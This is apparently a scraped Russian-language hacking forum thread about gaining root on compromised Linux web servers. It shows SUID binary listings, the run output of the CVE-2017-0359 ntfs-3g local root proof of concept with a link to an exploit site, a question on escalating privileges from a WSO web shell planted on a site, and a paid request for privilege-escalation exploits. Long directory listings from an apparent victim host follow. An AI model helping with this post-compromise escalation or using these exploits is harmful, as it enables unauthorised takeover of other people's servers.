/usr/bin/procmail -rwsr-xr-x 1 root root 54192 Feb 24 10:09 /usr/bin/passwd -rwsr-sr-x 1 daemon daemon 55424 Sep 30 2014 /usr/bin/at -rwsr-xr-x 1 root root 75376 Feb 24 10:09 /usr/bin/gpasswd -rwsr-xr-x 1 root root 44464 Feb 24 10:09 /usr/bin/chsh -rwsr-xr-x 1 root root 53616 Feb 24 10:09 /usr/bin/chfn -rwsr-xr-x 1 root root 157760 Jan 11 2016 /usr/bin/sudo -rwsr-xr-x 1 root root 146160 Jan 28 12:16 /bin/ntfs-3g -rwsr-xr-x 1 root root 30800 Jan 21 2016 /bin/fusermount -rwsr-xr-x 1 root root 40168 Feb 24 10:09 /bin/su -rwsr-xr-x 1 root root 27416 Mar 30 2015 /bin/umount -rwsr-xr-x 1 root root 40000 Mar 30 2015 /bin/mount meow MEOW! p.s. /bin/ntfs-3g Code: ntfs-3g: No device is specified. ntfs-3g 2014.2.15AR.2 integrated FUSE 28 - Third Generation NTFS Driver Configuration type 7, XATTRS are on, POSIX ACLS are on Copyright (C) 2005-2007 Yura Pakhuchiy Copyright (C) 2006-2009 Szabolcs Szakacsits Copyright (C) 2007-2014 Jean-Pierre Andre Copyright (C) 2009 Erik Larsson Usage: ntfs-3g [-o option[,...]] <device|image_file> <mount_point> Options: ro (read-only mount), windows_names, uid=, gid=, umask=, fmask=, dmask=, streams_interface=. Please see the details in the manual (type: man ntfs-3g). Example: ntfs-3g /dev/sda1 /mnt/windows News, support and information: http://tuxera.com одняко -> http://0day.today/exploit/26893 -> Code: sh-4.3$ /bin/bash /tmp/1.sh /bin/bash /tmp/1.sh @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ CVE-2017-0359, PoC by Kristian Erik Hermansen @ @ ntfs-3g local privilege escalation to root @ @ Credits to Google Project Zero @ @ Affects: Debian 9/8/7, Ubuntu, Gentoo, others @ @ Tested: Debian 9 (Stretch) @ @ Date: 2017-02-03 @ @ Link: https://goo.gl/A9I8Vq @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ [*] Gathering environment info ... [*] Creating kernel hijack directories ... mkdir: cannot create directory '/var/www/clients/client2/web8/web/modules/crm/lib': Permission denied mkdir: cannot create directory '/var/www/clients/client2/web8/web/modules/crm/kernel': Permission denied [*] Forging symlinks ... ln: failed to create symbolic link '/var/www/clients/client2/web8/web/modules/crm/lib/modules\r/3.16.0-4-amd64\r\r': No such file or directory ln: failed to create symbolic link '/var/www/clients/client2/web8/web/modules/crm/kernel/fs\r/fuse\r': No such file or directory ln: failed to create symbolic link 'fuse.ko\r': Permission denied [*] Pulling in deps ... [*] Building kernel module ... /tmp/1.sh: line 25: $'\r': command not found /tmp/1.sh: line 64: warning: here-document at line 26 delimited by end-of-file (wanted `EOF') : Permission denied cve_2017_0358.c
Вопрос скорее всего неоднократно задавался, но всё-таки...имея wso Шелл на сайте какие есть способы поднятия прав до рута? З.Ы. понимаю что универсального решения нет в этом вопросе, можно на примере объяснить, или подсказать примерный алгоритм
ищу людей кто умеет писать эксплоиты уязвимостей типа буфер оверфлоу с целью повышения привелегий на UNIX подобных ОС. за деньги. ЛС.
Буду очень благодарен за любую помощь uname -a Code: Linux p314371.asd.ru 3.10.63-1.el6.elrepo.x86_64 #1 SMP Tue Dec 16 16:52:21 EST 2014 x86_64 x86_64 x86_64 GNU/Linux ls -la /boot Code: total 145304 dr-xr-xr-x. 4 root root 4096 Aug 31 2016 . dr-xr-xr-x. 22 root root 4096 Feb 3 00:35 .. -rw-r--r-- 1 root root 171 Jul 25 2014 .vmlinuz-2.6.32-431.20.5.el6.x86_64.hmac -rw-r--r-- 1 root root 2519609 Jul 25 2014 System.map-2.6.32-431.20.5.el6.x86_64 -rw------- 1 root root 2926925 Mar 17 2016 System.map-3.10.101-1.el6.elrepo.x86_64 -rw------- 1 root root 2928277 Aug 29 2016 System.map-3.10.103-1.el6.elrepo.x86_64 -rw-r--r-- 1 root root 2924029 Dec 17 2014 System.map-3.10.63-1.el6.elrepo.x86_64 -rw-r--r-- 1 root root 2925203 Jun 7 2015 System.map-3.10.80-1.el6.elrepo.x86_64 -rw-r--r-- 1 root root 2925063 Sep 22 2015 System.map-3.10.89-1.el6.elrepo.x86_64 -rw-r--r-- 1 root root 105200 Jul 25 2014 config-2.6.32-431.20.5.el6.x86_64 -rw-r--r-- 1 root root 142360 Mar 17 2016 config-3.10.101-1.el6.elrepo.x86_64 -rw-r--r-- 1 root root 142778 Aug 29 2016 config-3.10.103-1.el6.elrepo.x86_64 -rw-r--r-- 1 root root 142373 Dec 17 2014 config-3.10.63-1.el6.elrepo.x86_64 -rw-r--r-- 1 root root 142381 Jun 7 2015 config-3.10.80-1.el6.elrepo.x86_64 -rw-r--r-- 1 root root 142381 Sep 22 2015 config-3.10.89-1.el6.elrepo.x86_64 drwxr-xr-x. 3 root root 4096 Sep 28 2012 efi drwxr-xr-x. 2 root root 4096 Aug 31 2016 grub -rw-------. 1 root root 14203374 Aug 4 2014 initramfs-2.6.32-431.20.5.el6.x86_64.img -rw------- 1 root root 17405311 Apr 5 2016 initramfs-3.10.101-1.el6.elrepo.x86_64.img -rw------- 1 root root 17424573 Aug 31 2016 initramfs-3.10.103-1.el6.elrepo.x86_64.img -rw------- 1 root root 17083963 Dec 22 2014 initramfs-3.10.63-1.el6.elrepo.x86_64.img -rw------- 1 root root 17361940 Jun 9 2015 initramfs-3.10.80-1.el6.elrepo.x86_64.img -rw------- 1 root root 17368226 Sep 24 2015 initramfs-3.10.89-1.el6.elrepo.x86_64.img -rw-r--r-- 1 root root 193901 Jul 25 2014 symvers-2.6.32-431.20.5.el6.x86_64.gz -rw-r--r-- 1 root root 258324 Mar 17 2016 symvers-3.10.101-1.el6.elrepo.x86_64.gz -rw-r--r-- 1 root root 258396 Aug 29 2016 symvers-3.10.103-1.el6.elrepo.x86_64.gz -rw-r--r-- 1 root root 258276 Dec 17 2014 symvers-3.10.63-1.el6.elrepo.x86_64.gz -rw-r--r-- 1 root root 258289 Jun 7 2015 symvers-3.10.80-1.el6.elrepo.x86_64.gz -rw-r--r-- 1 root root 258410 Sep 22 2015 symvers-3.10.89-1.el6.elrepo.x86_64.gz -rwxr-xr-x 1 root root 4131440 Jul 25 2014 vmlinuz-2.6.32-431.20.5.el6.x86_64 -rwxr-xr-x 1 root root 4860304 Mar 17 2016 vmlinuz-3.10.101-1.el6.elrepo.x86_64 -rwxr-xr-x 1 root root 4865264 Aug 29 2016 vmlinuz-3.10.103-1.el6.elrepo.x86_64 -rwxr-xr-x 1 root root 4846192 Dec 17 2014 vmlinuz-3.10.63-1.el6.elrepo.x86_64 -rwxr-xr-x 1 root root 4852592 Jun 7 2015 vmlinuz-3.10.80-1.el6.elrepo.x86_64 -rwxr-xr-x 1 root root 4852592 Sep 22 2015 vmlinuz-3.10.89-1.el6.elrepo.x86_64 ls -la --full-time /lib Code: total 3796 dr-xr-xr-x. 10 root root 4096 2017-01-20 13:27:07.905172467 +0300 . dr-xr-xr-x. 22 root root 4096 2017-02-03 00:35:44.699000000 +0300 .. lrwxrwxrwx 1 root root 14 2016-08-31 11:54:58.256945288 +0300 cpp -> ../usr/bin/cpp drwxr-xr-x. 45 root root 12288 2017-01-20 13:27:06.925187250 +0300 firmware drwxr-xr-x 3 root root 4096 2016-05-10 16:16:57.000000000 +0300 i686 drwxr-xr-x. 6 root root 4096 2012-09-28 12:27:51.000000000 +0400 kbd -rwxr-xr-x 1 root root 145272 2016-05-10 16:45:52.000000000 +0300 ld-2.12.so lrwxrwxrwx 1 root root 10 2016-08-31 16:20:47.370693128 +0300 ld-linux.so.2 -> ld-2.12.so -rwxr-xr-x 1 root root 7224 2016-05-10 16:45:54.000000000 +0300 libBrokenLocale-2.12.so lrwxrwxrwx 1 root root 23 2016-08-31 16:20:47.372693095 +0300 libBrokenLocale.so.1 -> libBrokenLocale-2.12.so -rwxr-xr-x 1 root root 20376 2016-05-10 16:45:54.000000000 +0300 libSegFault.so -rwxr-xr-x 1 root root 13416 2016-05-10 16:45:54.000000000 +0300 libanl-2.12.so lrwxrwxrwx 1 root root 14 2016-08-31 16:20:47.375693044 +0300 libanl.so.1 -> libanl-2.12.so -rwxr-xr-x 1 root root 1908112 2016-05-10 16:45:55.000000000 +0300 libc-2.12.so lrwxrwxrwx 1 root root 12 2016-08-31 16:20:47.490691114 +0300 libc.so.6 -> libc-2.12.so -rwxr-xr-x 1 root root 190992 2016-05-10 16:45:53.000000000 +0300 libcidn-2.12.so lrwxrwxrwx 1 root root 15 2016-08-31 16:20:47.500690946 +0300 libcidn.so.1 -> libcidn-2.12.so -rwxr-xr-x 1 root root 38380 2016-05-10 16:45:53.000000000 +0300 libcrypt-2.12.so lrwxrwxrwx 1 root root 16 2016-08-31 16:20:47.506690845 +0300 libcrypt.so.1 -> libcrypt-2.12.so -rwxr-xr-x 1 root root 17896 2016-05-10 16:45:52.000000000 +0300 libdl-2.12.so lrwxrwxrwx 1 root root 13 2016-08-31 16:20:47.507690829 +0300 libdl.so.2 -> libdl-2.12.so lrwxrwxrwx 1 root root 17 2017-01-20 13:27:07.896172603 +0300 libexpat.so.1 -> libexpat.so.1.5.2 -rwxr-xr-x 1 root root 160956 2016-11-29 01:18:51.000000000 +0300 libexpat.so.1.5.2 -rw-r--r-- 1 root root 899 2016-07-12 18:29:13.000000000 +0300 libfreebl3.chk -rwxr-xr-x 1 root root 9604 2016-07-12 18:29:13.000000000 +0300 libfreebl3.so -rw-r--r-- 1 root root 899 2016-07-12 18:29:13.000000000 +0300 libfreeblpriv3.chk -rwxr-xr-x 1 root root 378504 2016-07-12 18:29:13.000000000 +0300 libfreeblpriv3.so -rwxr-xr-x 1 root root 200092 2016-05-10 16:45:54.000000000 +0300 libm-2.12.so lrwxrwxrwx 1 root root 12 2016-08-31 16:20:47.519690627 +0300 libm.so.6 -> libm-2.12.so -rwxr-xr-x 1 root root 113912 2016-05-10 16:45:55.000000000 +0300 libnsl-2.12.so lrwxrwxrwx 1 root root 14 2016-08-31 16:20:47.525690527 +0300 libnsl.so.1 -> libnsl-2.12.so -rwxr-xr-x 1 root root 40200 2016-05-10 16:45:54.000000000 +0300 libnss_compat-2.12.so lrwxrwxrwx 1 root root 21 2016-08-31 16:20:47.528690476 +0300 libnss_compat.so.2 -> libnss_compat-2.12.so -rwxr-xr-x 1 root root 25596 2016-05-10 16:45:54.000000000 +0300 libnss_dns-2.12.so lrwxrwxrwx 1 root root 18 2016-08-31 16:20:47.530690443 +0300 libnss_dns.so.2 -> libnss_dns-2.12.so -rwxr-xr-x 1 root root 58728 2016-05-10 16:45:53.000000000 +0300 libnss_files-2.12.so lrwxrwxrwx 1 root root 20 2016-08-31 16:20:47.533690392 +0300 libnss_files.so.2 -> libnss_files-2.12.so -rwxr-xr-x 1 root root 22140 2016-05-10 16:45:53.000000000 +0300 libnss_hesiod-2.12.so lrwxrwxrwx 1 root root 21 2016-08-31 16:20:47.534690375 +0300 libnss_hesiod.so.2 -> libnss_hesiod-2.12.so -rwxr-xr-x 1 root root 49712 2016-05-10 16:45:53.000000000 +0300 libnss_nis-2.12.so lrwxrwxrwx 1 root root 18 2016-08-31 16:20:47.537690325 +0300 libnss_nis.so.2 -> libnss_nis-2.12.so -rwxr-xr-x 1 root root 58712 2016-05-10 16:45:53.000000000 +0300 libnss_nisplus-2.12.so lrwxrwxrwx 1 root root 22 2016-08-31 16:20:47.540690275 +0300 libnss_nisplus.so.2 -> libnss_nisplus-2.12.so -rwxr-xr-x 1 root root 131260 2016-05-10 16:45:55.000000000 +0300 libpthread-2.12.so lrwxrwxrwx 1 root root 18 2016-08-31 16:20:47.547690157 +0300 libpthread.so.0 -> libpthread-2.12.so -rwxr-xr-x 1 root root 103388 2016-05-10 16:45:54.000000000 +0300 libresolv-2.12.so lrwxrwxrwx 1 root root 17 2016-08-31 16:20:47.555690023 +0300 libresolv.so.2 -> libresolv-2.12.so -rwxr-xr-x 1 root root 39764 2016-05-10 16:45:53.000000000 +0300 librt-2.12.so lrwxrwxrwx 1 root root 13 2016-08-31 16:20:47.558689973 +0300 librt.so.1 -> librt-2.12.so -rwxr-xr-x 1 root root 31620 2016-05-10 16:45:54.000000000 +0300 libthread_db-1.0.so lrwxrwxrwx 1 root root 19 2016-08-31 16:20:47.560689939 +0300 libthread_db.so.1 -> libthread_db-1.0.so -rwxr-xr-x 1 root root 12792 2016-05-10 16:45:52.000000000 +0300 libutil-2.12.so lrwxrwxrwx 1 root root 15 2016-08-31 16:20:47.561689922 +0300 libutil.so.1 -> libutil-2.12.so dr-xr-xr-x. 8 root root 4096 2016-08-31 16:20:56.362542218 +0300 modules drwxr-xr-x 3 root root 4096 2016-08-31 16:20:47.565689855 +0300 rtkaio drwxr-xr-x. 2 root root 4096 2016-05-11 02:18:18.000000000 +0300 security drwxr-xr-x. 6 root root 4096 2015-03-16 11:53:51.000000000 +0300 terminfo drwxr-xr-x. 5 root root 4096 2016-09-14 15:20:27.466794682 +0300 udev ls -la --full-time /lib64 Code: total 16640 dr-xr-xr-x. 8 root root 12288 2017-01-20 13:27:07.373180492 +0300 . dr-xr-xr-x. 22 root root 4096 2017-02-03 00:35:44.699000000 +0300 .. -rw-r--r--. 1 root root 65 2011-12-07 23:13:53.000000000 +0400 .libfipscheck.so.1.1.0.hmac lrwxrwxrwx. 1 root root 27 2012-09-28 12:27:44.000000000 +0400 .libfipscheck.so.1.hmac -> .libfipscheck.so.1.1.0.hmac -rw-r--r-- 1 root root 65 2016-11-11 22:42:09.000000000 +0300 .libgcrypt.so.11.hmac drwxr-xr-x 2 root root 4096 2016-04-05 14:18:15.198119825 +0300 dbus-1 -rwxr-xr-x 1 root root 154664 2016-05-10 17:11:19.000000000 +0300 ld-2.12.so lrwxrwxrwx 1 root root 10 2016-08-31 16:19:30.983976451 +0300 ld-linux-x86-64.so.2 -> ld-2.12.so -rwxr-xr-x 1 root root 8488 2016-05-10 17:11:21.000000000 +0300 libBrokenLocale-2.12.so lrwxrwxrwx 1 root root 23 2016-08-31 16:19:30.984976434 +0300 libBrokenLocale.so.1 -> libBrokenLocale-2.12.so -rwxr-xr-x 1 root root 21928 2016-05-10 17:11:20.000000000 +0300 libSegFault.so lrwxrwxrwx. 1 root root 15 2012-09-28 12:27:28.000000000 +0400 libacl.so.1 -> libacl.so.1.1.0 -rwxr-xr-x. 1 root root 31280 2011-12-07 20:53:53.000000000 +0400 libacl.so.1.1.0 lrwxrwxrwx 1 root root 22 2014-06-17 13:19:37.000000000 +0400 libaio.so.1 -> /lib64/libaio.so.1.0.1 -rwxr-xr-x 1 root root 3944 2010-08-23 01:08:18.000000000 +0400 libaio.so.1.0.0 -rwxr-xr-x 1 root root 3944 2010-08-23 01:08:18.000000000 +0400 libaio.so.1.0.1 -rwxr-xr-x 1 root root 19368 2016-05-10 17:11:20.000000000 +0300 libanl-2.12.so lrwxrwxrwx 1 root root 14 2016-08-31 16:19:30.987976384 +0300 libanl.so.1 -> libanl-2.12.so lrwxrwxrwx 1 root root 18 2016-08-31 16:20:38.350844541 +0300 libasound.so.2 -> libasound.so.2.0.0 -rwxr-xr-x 1 root root 983440 2016-05-11 10:09:48.000000000 +0300 libasound.so.2.0.0 lrwxrwxrwx. 1 root root 16 2012-09-28 12:27:28.000000000 +0400 libattr.so.1 -> libattr.so.1.1.0 -rwxr-xr-x. 1 root root 18712 2011-09-23 22:53:58.000000000 +0400 libattr.so.1.1.0 lrwxrwxrwx 1 root root 17 2016-08-31 16:19:35.909893622 +0300 libaudit.so.1 -> libaudit.so.1.0.0 -rwxr-xr-x 1 root root 145864 2016-05-11 09:17:06.000000000 +0300 libaudit.so.1.0.0 lrwxrwxrwx 1 root root 19 2016-08-31 16:19:35.920893437 +0300 libauparse.so.0 -> libauparse.so.0.0.0 -rwxr-xr-x 1 root root 88672 2016-05-11 09:17:06.000000000 +0300 libauparse.so.0.0.0 lrwxrwxrwx 1 root root 17 2017-01-20 13:26:14.641975855 +0300 libblkid.so.1 -> libblkid.so.1.1.0 -rwxr-xr-x 1 root root 136136 2016-11-18 18:38:31.000000000 +0300 libblkid.so.1.1.0 lrwxrwxrwx. 1 root root 15 2012-09-28 12:27:29.000000000 +0400 libbz2.so.1 -> libbz2.so.1.0.4 -rwxr-xr-x. 1 root root 67592 2011-06-25 05:45:55.000000000 +0400 libbz2.so.1.0.4 -rwxr-xr-x 1 root root 1923352 2016-05-10 17:11:22.000000000 +0300 libc-2.12.so lrwxrwxrwx 1 root root 12 2016-08-31 16:19:31.087974702 +0300 libc.so.6 -> libc-2.12.so lrwxrwxrwx. 1 root root 18 2012-09-28 12:27:42.000000000 +0400 libcap-ng.so.0 -> libcap-ng.so.0.0.0 -rwxr-xr-x. 1 root root 18672 2011-06-25 07:49:32.000000000 +0400 libcap-ng.so.0.0.0 lrwxrwxrwx. 1 root root 14 2012-09-28 12:27:28.000000000 +0400 libcap.so.2 -> libcap.so.2.16 -rwxr-xr-x. 1 root root 16600 2011-12-08 00:04:01.000000000 +0400 libcap.so.2.16 lrwxrwxrwx 1 root root 19 2016-09-01 13:31:20.935441246 +0300 libcgroup.so.1 -> libcgroup.so.1.0.40 -rwxr-xr-x 1 root root 100488 2016-07-12 19:27:19.000000000 +0300 libcgroup.so.1.0.40 -rwxr-xr-x 1 root root 197064 2016-05-10 17:11:19.000000000 +0300 libcidn-2.12.so lrwxrwxrwx 1 root root 15 2016-08-31 16:19:31.096974551 +0300 libcidn.so.1 -> libcidn-2.12.so lrwxrwxrwx 1 root root 17 2015-09-24 13:39:12.714000000 +0300 libcom_err.so.2 -> libcom_err.so.2.1 -rwxr-xr-x 1 root root 14664 2015-07-24 13:33:24.000000000 +0300 libcom_err.so.2.1 -rwxr-xr-x 1 root root 40400 2016-05-10 17:11:20.000000000 +0300 libcrypt-2.12.so lrwxrwxrwx 1 root root 16 2016-08-31 16:19:31.099974500 +0300 libcrypt.so.1 -> libcrypt-2.12.so -rwxr-xr-x 1 root root 1525560 2017-01-11 21:40:04.000000000 +0300 libdb-4.7.so lrwxrwxrwx 1 root root 18 2015-06-09 15:16:04.212000000 +0300 libdbus-1.so.3 -> libdbus-1.so.3.4.0 -rwxr-xr-x 1 root root 265728 2015-04-22 13:52:25.000000000 +0300 libdbus-1.so.3.4.0 -rwxr-xr-x 1 root root 19536 2016-05-10 17:11:19.000000000 +0300 libdl-2.12.so lrwxrwxrwx 1 root root 13 2016-08-31 16:19:31.100974484 +0300 libdl.so.2 -> libdl-2.12.so lrwxrwxrwx 1 root root 13 2015-09-24 13:39:23.481000000 +0300 libe2p.so.2 -> libe2p.so.2.3 -rwxr-xr-x 1 root root 28120 2015-07-24 13:33:24.000000000 +0300 libe2p.so.2.3 lrwxrwxrwx 1 root root 17 2017-01-20 13:26:13.981985808 +0300 libexpat.so.1 -> libexpat.so.1.5.2 -rwxr-xr-x 1 root root 165040 2016-11-29 01:21:21.000000000 +0300 libexpat.so.1.5.2 lrwxrwxrwx 1 root root 16 2015-09-24 13:39:23.486000000 +0300 libext2fs.so.2 -> libext2fs.so.2.4 -rwxr-xr-x 1 root root 201784 2015-07-24 13:33:24.000000000 +0300 libext2fs.so.2.4 lrwxrwxrwx. 1 root root 21 2012-09-28 12:27:44.000000000 +0400 libfipscheck.so.1 -> libfipscheck.so.1.1.0 -rwxr-xr-x. 1 root root 10288 2011-12-07 23:13:53.000000000 +0400 libfipscheck.so.1.1.0 -rw-r--r-- 1 root root 899 2016-07-12 18:35:41.000000000 +0300 libfreebl3.chk -rwxr-xr-x 1 root root 10312 2016-07-12 18:35:41.000000000 +0300 libfreebl3.so -rw-r--r-- 1 root root 899 2016-07-12 18:35:41.000000000 +0300 libfreeblpriv3.chk -rwxr-xr-x 1 root root 477712 2016-07-12 18:35:41.000000000 +0300 libfreeblpriv3.so -rwxr-xr-x 1 root root 90880 2016-05-10 12:38:12.000000000 +0300 libgcc_s-4.4.7-20120601.so.1 lrwxrwxrwx 1 root root 28 2016-08-31 11:54:57.160963302 +0300 libgcc_s.so.1 -> libgcc_s-4.4.7-20120601.so.1 lrwxrwxrwx 1 root root 19 2017-01-20 13:27:07.344180930 +0300 libgcrypt.so.11 -> libgcrypt.so.11.5.3 -rwxr-xr-x 1 root root 478496 2016-11-11 22:42:09.000000000 +0300 libgcrypt.so.11.5.3 lrwxrwxrwx 1 root root 22 2016-08-31 16:19:35.985892344 +0300 libgio-2.0.so.0 -> libgio-2.0.so.0.2800.8 -rwxr-xr-x 1 root root 1148296 2016-05-11 01:41:53.000000000 +0300 libgio-2.0.so.0.2800.8 lrwxrwxrwx 1 root root 23 2016-08-31 16:19:36.050891252 +0300 libglib-2.0.so.0 -> libglib-2.0.so.0.2800.8 -rwxr-xr-x 1 root root 1140496 2016-05-11 01:41:53.000000000 +0300 libglib-2.0.so.0.2800.8 lrwxrwxrwx 1 root root 26 2016-08-31 16:19:36.122890041 +0300 libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.2800.8 -rwxr-xr-x 1 root root 11832 2016-05-11 01:41:53.000000000 +0300 libgmodule-2.0.so.0.2800.8 lrwxrwxrwx 1 root root 26 2016-08-31 16:19:36.126889974 +0300 libgobject-2.0.so.0 -> libgobject-2.0.so.0.2800.8 -rwxr-xr-x 1 root root 308848 2016-05-11 01:41:53.000000000 +0300 libgobject-2.0.so.0.2800.8 lrwxrwxrwx. 1 root root 21 2012-09-28 12:27:31.000000000 +0400 libgpg-error.so.0 -> libgpg-error.so.0.5.0 -rwxr-xr-x. 1 root root 14288 2011-12-07 21:37:21.000000000 +0400 libgpg-error.so.0.5.0 lrwxrwxrwx 1 root root 21 2016-08-31 16:19:35.584899087 +0300 libgssapi_krb5.so.2 -> libgssapi_krb5.so.2.2 -rwxr-xr-x 1 root root 277704 2016-05-11 01:56:56.000000000 +0300 libgssapi_krb5.so.2.2 lrwxrwxrwx 1 root root 16 2016-08-31 16:19:35.611898633 +0300 libgssrpc.so.4 -> libgssrpc.so.4.1 -rwxr-xr-x 1 root root 131384 2016-05-11 01:56:56.000000000 +0300 libgssrpc.so.4.1 lrwxrwxrwx 1 root root 26 2016-08-31 16:19:36.146889637 +0300 libgthread-2.0.so.0 -> libgthread-2.0.so.0.2800.8 -rwxr-xr-x 1 root root 17536 2016-05-11 01:41:53.000000000 +0300 libgthread-2.0.so.0.2800.8 lrwxrwxrwx. 1 root root 16 2012-09-28 12:27:31.000000000 +0400 libidn.so.11 -> libidn.so.11.6.1 -rwxr-xr-x. 1 root root 206672 2010-08-24 04:51:20.000000000 +0400 libidn.so.11.6.1 lrwxrwxrwx 1 root root 34 2015-09-24 13:44:32.109000000 +0300 libip4tc.so.0 -> /etc/alternatives/libip4tc0.x86_64 lrwxrwxrwx 1 root root 23 2015-09-24 13:40:38.566000000 +0300 libip4tc.so.0-1.4.7 -> libip4tc.so.0.0.0-1.4.7 lrwxrwxrwx 1 root root 36 2015-09-24 13:44:32.109000000 +0300 libip4tc.so.0.0.0 -> /etc/alternatives/libip4tc000.x86_64 -rwxr-xr-x 1 root root 26360 2015-07-24 05:10:22.000000000 +0300 libip4tc.so.0.0.0-1.4.7 lrwxrwxrwx 1 root root 34 2015-09-24 13:44:32.109000000 +0300 libip6tc.so.0 -> /etc/alternatives/libip6tc0.x86_64 lrwxrwxrwx 1 root root 23 2015-09-24 13:40:38.568000000 +0300 libip6tc.so.0-1.4.7 -> libip6tc.so.0.0.0-1.4.7 lrwxrwxrwx 1 root root 36 2015-09-24 13:44:32.109000000 +0300 libip6tc.so.0.0.0 -> /etc/alternatives/libip6tc000.x86_64 -rwxr-xr-x 1 root root 28064 2015-07-24 05:10:22.000000000 +0300 libip6tc.so.0.0.0-1.4.7 lrwxrwxrwx 1 root root 32 2015-09-24 13:44:32.109000000 +0300 libipq.so.0 -> /etc/alternatives/libipq0.x86_64 lrwxrwxrwx 1 root root 21 2015-09-24 13:40:38.570000000 +0300 libipq.so.0-1.4.7 -> libipq.so.0.0.0-1.4.7 lrwxrwxrwx 1 root root 34 2015-09-24 13:44:32.109000000 +0300 libipq.so.0.0.0 -> /etc/alternatives/libipq000.x86_64 -rwxr-xr-x 1 root root 9280 2015-07-24 05:10:22.000000000 +0300 libipq.so.0.0.0-1.4.7 lrwxrwxrwx 1 root root 33 2015-09-24 13:44:32.109000000 +0300 libiptc.so.0 -> /etc/alternatives/libiptc0.x86_64 lrwxrwxrwx 1 root root 22 2015-09-24 13:40:38.571000000 +0300 libiptc.so.0-1.4.7 -> libiptc.so.0.0.0-1.4.7 lrwxrwxrwx 1 root root 35 2015-09-24 13:44:32.109000000 +0300 libiptc.so.0.0.0 -> /etc/alternatives/libiptc000.x86_64 -rwxr-xr-x 1 root root 3680 2015-07-24 05:10:21.000000000 +0300 libiptc.so.0.0.0-1.4.7 lrwxrwxrwx 1 root root 18 2016-08-31 16:19:35.625898397 +0300 libk5crypto.so.3 -> libk5crypto.so.3.1 -rwxr-xr-x 1 root root 174840 2016-05-11 01:56:56.000000000 +0300 libk5crypto.so.3.1 lrwxrwxrwx 1 root root 18 2014-12-01 11:49:42.935000000 +0300 libkeyutils.so.1 -> libkeyutils.so.1.3 -rwxr-xr-x 1 root root 10192 2014-10-15 15:08:05.000000000 +0400 libkeyutils.so.1.3 lrwxrwxrwx 1 root root 14 2016-08-31 16:19:35.643898095 +0300 libkrb5.so.3 -> libkrb5.so.3.3 -rwxr-xr-x 1 root root 946048 2016-05-11 01:56:56.000000000 +0300 libkrb5.so.3.3 lrwxrwxrwx 1 root root 21 2016-08-31 16:19:35.721896783 +0300 libkrb5support.so.0 -> libkrb5support.so.0.1 -rwxr-xr-x 1 root root 43728 2016-05-11 01:56:56.000000000 +0300 libkrb5support.so.0.1 lrwxrwxrwx 1 root root 21 2016-08-31 16:19:40.845810635 +0300 liblber-2.4.so.2 -> liblber-2.4.so.2.10.3 -rwxr-xr-x 1 root root 60512 2016-05-11 02:32:56.000000000 +0300 liblber-2.4.so.2.10.3 lrwxrwxrwx 1 root root 21 2016-08-31 16:19:40.849810568 +0300 libldap-2.4.so.2 -> libldap-2.4.so.2.10.3 -rwxr-xr-x 1 root root 330864 2016-05-11 02:32:56.000000000 +0300 libldap-2.4.so.2.10.3 lrwxrwxrwx 1 root root 23 2016-08-31 16:19:40.868810249 +0300 libldap_r-2.4.so.2 -> libldap_r-2.4.so.2.10.3 -rwxr-xr-x 1 root root 356048 2016-05-11 02:32:56.000000000 +0300 libldap_r-2.4.so.2.10.3 lrwxrwxrwx 1 root root 21 2016-08-31 16:19:40.881810030 +0300 libldif-2.4.so.2 -> libldif-2.4.so.2.10.3 -rwxr-xr-x 1 root root 5960 2016-05-11 02:32:56.000000000 +0300 libldif-2.4.so.2.10.3 -rwxr-xr-x 1 root root 596360 2016-05-10 17:11:21.000000000 +0300 libm-2.12.so lrwxrwxrwx 1 root root 12 2016-08-31 16:19:31.137973862 +0300 libm.so.6 -> libm-2.12.so lrwxrwxrwx 1 root root 17 2017-01-20 13:26:14.748974241 +0300 libmount.so.1 -> libmount.so.1.1.0 -rwxr-xr-x 1 root root 65856 2016-11-18 18:38:31.000000000 +0300 libmount.so.1.1.0 lrwxrwxrwx 1 root root 17 2015-09-24 13:39:11.291000000 +0300 libncurses.so.5 -> libncurses.so.5.7 -rwxr-xr-x 1 root root 139784 2015-03-16 11:54:00.000000000 +0300 libncurses.so.5.7 lrwxrwxrwx 1 root root 18 2015-09-24 13:39:11.302000000 +0300 libncursesw.so.5 -> libncursesw.so.5.7 -rwxr-xr-x 1 root root 189368 2015-03-16 11:54:00.000000000 +0300 libncursesw.so.5.7 lrwxrwxrwx. 1 root root 20 2012-09-28 12:27:33.000000000 +0400 libnih-dbus.so.1 -> libnih-dbus.so.1.0.0 -rwxr-xr-x. 1 root root 39896 2011-12-07 21:40:52.000000000 +0400 libnih-dbus.so.1.0.0 lrwxrwxrwx. 1 root root 15 2012-09-28 12:27:33.000000000 +0400 libnih.so.1 -> libnih.so.1.0.0 -rwxr-xr-x. 1 root root 101920 2011-12-07 21:40:52.000000000 +0400 libnih.so.1.0.0 lrwxrwxrwx 1 root root 14 2014-06-17 13:10:48.000000000 +0400 libnl.so.1 -> libnl.so.1.1.4 -rwxr-xr-x 1 root root 337248 2013-11-22 15:27:57.000000000 +0400 libnl.so.1.1.4 -rwxr-xr-x 1 root root 113432 2016-05-10 17:11:21.000000000 +0300 libnsl-2.12.so lrwxrwxrwx 1 root root 14 2016-08-31 16:19:31.144973744 +0300 libnsl.so.1 -> libnsl-2.12.so -rwxr-xr-x 1 root root 244624 2016-05-11 10:14:23.000000000 +0300 libnspr4.so -rwxr-xr-x 1 root root 42808 2016-05-10 17:11:21.000000000 +0300 libnss_compat-2.12.so lrwxrwxrwx 1 root root 21 2016-08-31 16:19:31.146973710 +0300 libnss_compat.so.2 -> libnss_compat-2.12.so -rwxr-xr-x 1 root root 27424 2016-05-10 17:11:21.000000000 +0300 libnss_dns-2.12.so lrwxrwxrwx 1 root root 18 2016-08-31 16:19:31.149973660 +0300 libnss_dns.so.2 -> libnss_dns-2.12.so -rwxr-xr-x 1 root root 65960 2016-05-10 17:11:20.000000000 +0300 libnss_files-2.12.so lrwxrwxrwx 1 root root 20 2016-08-31 16:19:31.152973609 +0300 libnss_files.so.2 -> libnss_files-2.12.so -rwxr-xr-x 1 root root 24152 2016-05-10 17:11:19.000000000 +0300 libnss_hesiod-2.12.so lrwxrwxrwx 1 root root 21 2016-08-31 16:19:31.154973575 +0300 libnss_hesiod.so.2 -> libnss_hesiod-2.12.so -rwxr-xr-x 1 root root 52560 2016-05-10 17:11:20.000000000 +0300 